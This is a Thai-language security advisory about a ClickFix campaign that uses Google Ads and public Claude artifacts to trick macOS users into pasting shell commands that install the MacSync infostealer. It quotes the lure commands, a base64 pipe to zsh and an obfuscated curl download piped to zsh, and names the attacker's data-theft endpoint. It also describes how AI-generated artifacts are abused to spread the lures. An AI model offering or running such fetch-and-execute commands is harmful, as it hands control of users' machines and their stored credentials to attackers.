กลุ่มผู้ไม่หวังดีกำลังใช้ประโยชน์จาก Claude artifacts และ Google Ads ในแคมเปญ ClickFix เพื่อส่งมัลแวร์ขโมยข้อมูลไปยังผู้ใช้งาน macOS ที่ค้นหาคำสั่งบางอย่าง แคมเปญนี้ส่งผลกระทบต่อผู้ใช้งาน MacSync infostealer ซึ่งถูกส่งผ่านการรันคำสั่ง shell ที่มาจากแหล่งข้อมูลที่ดูน่าเชื่อถือแต่เป็นอันตราย
Severity: สูง
System Impact:
- macOS
- Google Ads
- Claude LLM (Anthropic)
Technical Attack Steps:
- กลุ่มผู้ไม่หวังดีใช้ Google Ads เพื่อโปรโมตผลการค้นหาที่เป็นอันตราย ซึ่งนำไปสู่ Claude artifact สาธารณะ หรือบทความ Medium ที่แอบอ้างเป็น Apple Support
- ผู้ใช้งานจะได้รับคำแนะนำให้คัดลอกคำสั่ง shell ไปวางใน Terminal (มีสองรูปแบบ: ‘echo “…” | base64 -D | zsh’ หรือ ‘true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh’)
- การรันคำสั่งใน Terminal จะดาวน์โหลดมัลแวร์ loader สำหรับ MacSync infostealer
- มัลแวร์จะสร้างการเชื่อมต่อกับโครงสร้างพื้นฐาน Command-and-Control (C2) โดยใช้โทเค็นและ API key ที่กำหนดไว้ และปลอมแปลง user-agent ของเบราว์เซอร์ macOS
- มัลแวร์ใช้ AppleScript (osascript) เพื่อขโมยข้อมูลที่ละเอียดอ่อน เช่น Keychain, ข้อมูลเบราว์เซอร์ และกระเป๋าคริปโต
- ข้อมูลที่ถูกขโมยจะถูกบรรจุในไฟล์ ‘/tmp/osalogging.zip’ และส่งออกไปยัง C2 ของผู้โจมตีที่ a2abotnet[.]com/gate ผ่านคำขอ HTTP POST
- หลังจากอัปโหลดสำเร็จ มัลแวร์จะลบร่องรอยทั้งหมด
Recommendations:
Short Term:
- หลีกเลี่ยงการรันคำสั่งใน Terminal ที่ไม่เข้าใจอย่างถ่องแท้ โดยเฉพาะจากแหล่งที่ไม่น่าเชื่อถือ (เช่น โฆษณา Google Ads หรือจาก LLM artifacts)
Long Term:
- ระมัดระวังผลการค้นหาจาก Google Ads และตรวจสอบความถูกต้องของแหล่งที่มาก่อนดำเนินการใดๆ
- ก่อนรันคำสั่งใดๆ ควรทำความเข้าใจคำสั่งนั้นอย่างละเอียด หรือสอบถาม Chatbot ในการสนทนาเดียวกันเกี่ยวกับความปลอดภัยของคำสั่ง
- ติดตั้งและอัปเดตซอฟต์แวร์ความปลอดภัยบน macOS อย่างสม่ำเสมอ
Share this content: